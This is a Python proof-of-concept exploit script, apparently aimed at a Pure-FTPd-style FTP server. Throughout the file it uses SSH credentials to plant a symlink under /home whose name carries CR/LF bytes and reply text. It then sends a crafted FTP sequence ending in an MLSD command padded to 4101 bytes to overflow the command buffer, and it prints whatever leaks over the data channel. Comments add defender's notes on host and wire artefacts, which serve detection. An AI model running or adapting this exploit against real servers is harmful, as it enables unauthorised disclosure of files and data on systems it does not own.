from pwn import remote
import paramiko
import sys
import re
# ---------------------------------------------------------------------------
# Proof-of-concept exploit script, run as:
#   python3 pure.py <server_ip> <ftp-port> <username> <password> <attack dir>
#
# What it does, in order (see the sections below):
#   1. Over SSH (port 22, same credentials) it creates a symlink directly
#      under /home whose *name* embeds a fragment of an FTP reply plus CR/LF
#      bytes, pointing at <attack dir>.
#   2. Over a raw FTP control connection it logs in, opens an extended
#      passive data channel (EPSV), provokes a 530 reply with a bare PASS,
#      sends an MLSD command padded to 4101 bytes, and prints whatever the
#      server writes to the data channel.
#
# Defender's notes, derived only from what this script sends:
#   - Host artefact: a symlink under /home with CR/LF and reply text in its
#     file name, created from an SSH session using FTP credentials.
#   - Wire artefact: an FTP command line of roughly 4 KB ("MLSD -" followed
#     by dots) sent right after an out-of-sequence PASS.
#   - The script name and the reply text suggest a Pure-FTPd-style server,
#     but the target software and version are not stated in this file.
# ---------------------------------------------------------------------------
if len(sys.argv) != 6:
    print("Usage: python3 pure.py <server_ip> <ftp-port> <username> <password> <attack dir>")
    sys.exit(1)

# Credentials arrive on the command line, so they are visible to other local
# users through process listings and shell history.
ip = sys.argv[1]
port = sys.argv[2]            # FTP control port; SSH is hard-coded to 22 below
username = sys.argv[3]
password = sys.argv[4]
attack_dir = sys.argv[5]      # target of the symlink created under /home

# connect to ssh and create sym link
client = paramiko.SSHClient()
# AutoAddPolicy accepts whatever host key the server presents, so the SSH
# session is not protected against a man-in-the-middle on first contact;
# acceptable only against a throwaway lab host.
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    # Connect to the SSH server
    client.connect(ip, 22, username, password)
    # Bash ANSI-C quoting ($'...'): the link name contains a literal ', CR and
    # LF bytes.  The embedded text overlaps the "530 We can't do that in the
    # current session" reply that the FTP side provokes further down.
    command = f"""
cd /home
ln -snf {attack_dir} $'e can\\'t do that in the current session\\r\\nogin\\r\\n'
"""
    # Execute the command
    stdin, stdout, stderr = client.exec_command(command)
except Exception as e:
    print(f"An error occurred: {e}")
finally:
    # Close the SSH connection
    client.close()

# Connect to ftp server & do exploit
session=remote(ip, port)
# authentication
# The USER/PASS replies are not read explicitly; the recvuntil() below
# consumes whatever is buffered up to the first ')'.
session.sendline(b"USER " + username.encode())
session.sendline(b"PASS " + password.encode())
#Send the extended passive mode , and capture the port number
session.sendline(b"EPSV")
# Pull the port out of a "(|||<port>|)" style EPSV reply.
response = session.recvuntil(b")").decode()
match = re.search(r'\|\|\|(\d+)\|', response)
if match:
    epsv_port = int(match.group(1))
    print(f"Extracted EPSV port: {epsv_port}")
else:
    print("No EPSV port found in the response.")
    session.close()
    sys.exit(1)
# Intentionally trigger an error message for a constant string in the reply buffer
session.sendline(b"PASS")
# Should reply: 530 We can't do that in the current session
print(session.recvline().decode())
# Overflow the cmd buffer
# "MLSD -" left-justified and padded with '.' to exactly 4101 bytes.
payload=b"MLSD -".ljust(4101,b'.')
session.sendline(payload)
# Print the control-channel reply to the oversized command.
print(session.recvline().decode())
# Connect to pasv port for MLSD response
pasv=remote(ip,epsv_port)
# Read and print all lines from the passive connection until no more data
try:
    while True:
        try:
            # presumably returns b'' on the 1 s timeout — see pwntools docs
            line = pasv.recvline(timeout=1)
            if not line:
                print("END")
                break
            print(line.decode().strip())
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt and
            # SystemExit; any EOF or decode error here ends the loop silently.
            break
finally:
    pasv.close()
    session.close()